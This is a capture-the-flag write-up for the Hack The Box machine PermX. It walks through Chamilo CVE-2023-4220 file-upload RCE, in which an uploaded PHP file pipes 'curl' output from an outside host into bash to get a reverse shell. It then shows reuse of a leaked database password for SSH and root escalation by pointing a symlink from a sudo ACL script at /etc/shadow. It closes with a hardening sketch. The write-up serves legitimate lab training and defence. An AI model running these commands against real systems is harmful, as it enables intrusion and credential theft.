Hack The Box / LINUX / 2026-03-27

Hack The Box - PermX (Linux)

Chamilo LMS exploitation via CVE-2023-4220 for initial access, credential reuse to SSH, and root escalation by abusing a vulnerable ACL helper script with symlink trickery.

Target

  • IP: 10.129.241.93

Recon

sudo nmap -sC -sV 10.129.241.93 -p- -v
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: eLEARNING
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add permx.htb to /etc/hosts.

Virtual Host Discovery

ffuf -u 'http://permx.htb/' -H 'Host: FUZZ.permx.htb' -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50 -fw 18
www                     [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 51ms]
lms                     [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 1422ms]
WWW                     [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 97ms]
LMS                     [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 140ms]

Add www.permx.htb and lms.permx.htb to /etc/hosts.

Browse to http://lms.permx.htb/.

Observed banner:

Powered by Chamilo © 2024

Local Chamilo Lab Notes

Check the attached files used to reproduce locally:

  • attachments/Dockerfile
  • attachments/chamilo.conf

docker build -t mychamilo .
/usr/sbin/mysqld --skip-grant-tables --user=root &
mysql -u root
use mysql
update user set plugin="mysql_native_password" where User='root';
ALTER USER 'root'@'localhost' IDENTIFIED BY 'ciao';
FLUSH PRIVILEGES;
CTRL+D
killall -9 mysqld
/etc/init.d/mysql start
/etc/init.d/apache2 start

If Apache does not start, run the command again.

Open Firefox on http://127.0.0.1/ and continue the setup procedure. At one step, an admin password is required, and a random password is suggested.

Failed Password Brute Force

hydra -l admin -P /usr/share/wordlists/rockyou.txt lms.permx.htb http-post-form "/index.php:login=^USER^&password=^PASS^&submitAuth=&_qf__formLogin=:F=incorrect"

This did not work.

Initial Access via Chamilo RCE

A public exploit for CVE-2023-4220 is available:

  • https://starlabs.sg/advisories/23/23-4220/

Start a listener:

nc -vlnp 4444

Create payload and upload it:

echo '<?php system("curl http://10.10.16.25/shell | bash"); ?>' > rce.php
curl -F 'bigUploadFile=@rce.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/rce.php'

We get a reverse shell.

Post-Exploitation Enumeration

cat /var/www/chamilo/main/install/version.php
Version 1.11.24
cat /var/www/chamilo/app/config/configuration.php
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;
cat /etc/passwd

A local user mtz is present.

User Access

ssh mtz@permx.htb

Use the database password (db_password) found in configuration.php; mtz reuses it for SSH.

Privilege Escalation

sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh
cat /opt/acl.sh
#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"

On the attacker machine, create a known hash:

docker run -it ubuntu:latest
useradd test
passwd test

Set password to 1234.

cat /etc/shadow
test:$y$j9T$H/bZuEutXRuRCiMPV.JzK1$tiSfIoRsqIGhVRcXIfyiiRRk46nNn0bkExZOoAhnvT5:19912:0:99999:7:::

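On the victim machine, from /home/mtz, create a symlink to /etc/shadow. The script only checks the path string, and the -f test follows symlinks, so the link passes both checks and setfacl applies the ACL to /etc/shadow itself: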

ln -s ../../etc/shadow
sudo /opt/acl.sh mtz rwx '/home/mtz/shadow'
vim shadow

Replace the root hash with the test hash.

su root

Use password 1234. We get a root shell.
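
How the target check in /opt/acl.sh could be hardened against the symlink step above, as an added example (not the box's script and not part of the original writeup). The function name resolve_acl_target is hypothetical, and GNU coreutils readlink and stat are assumed.

```sh
#!/bin/sh
# Added hardening sketch for the target check in /opt/acl.sh.
# resolve_acl_target BASE TARGET  (hypothetical helper name)
#   Prints the canonical path and returns 0 only if TARGET is a regular,
#   non-symlink, singly-linked file whose resolved path lies under BASE.
resolve_acl_target() {
    base=$(readlink -f -- "$1") || return 1
    target=$2

    # Reject symlinks outright: [ -f ] follows links, [ -L ] does not.
    if [ -L "$target" ]; then
        echo "Access denied: symlink." >&2
        return 1
    fi

    # Canonicalise so symlinked parent directories are resolved as well.
    resolved=$(readlink -f -- "$target") || return 1

    # Compare the resolved path, not the string the caller supplied.
    case "$resolved" in
        "$base"/*) ;;
        *) echo "Access denied: outside $base." >&2; return 1 ;;
    esac

    if [ ! -f "$resolved" ]; then
        echo "Target must be a regular file." >&2
        return 1
    fi

    # A hard link to a file elsewhere would also pass the path comparison.
    links=$(stat -c %h -- "$resolved") || return 1
    if [ "$links" -ne 1 ]; then
        echo "Access denied: multiple hard links." >&2
        return 1
    fi

    printf '%s\n' "$resolved"
}
```

A check like this still leaves a window between validation and the setfacl call, because mtz owns the directory and can swap the file in between. The more robust fix is to not grant sudo on an operation whose target path the calling user controls.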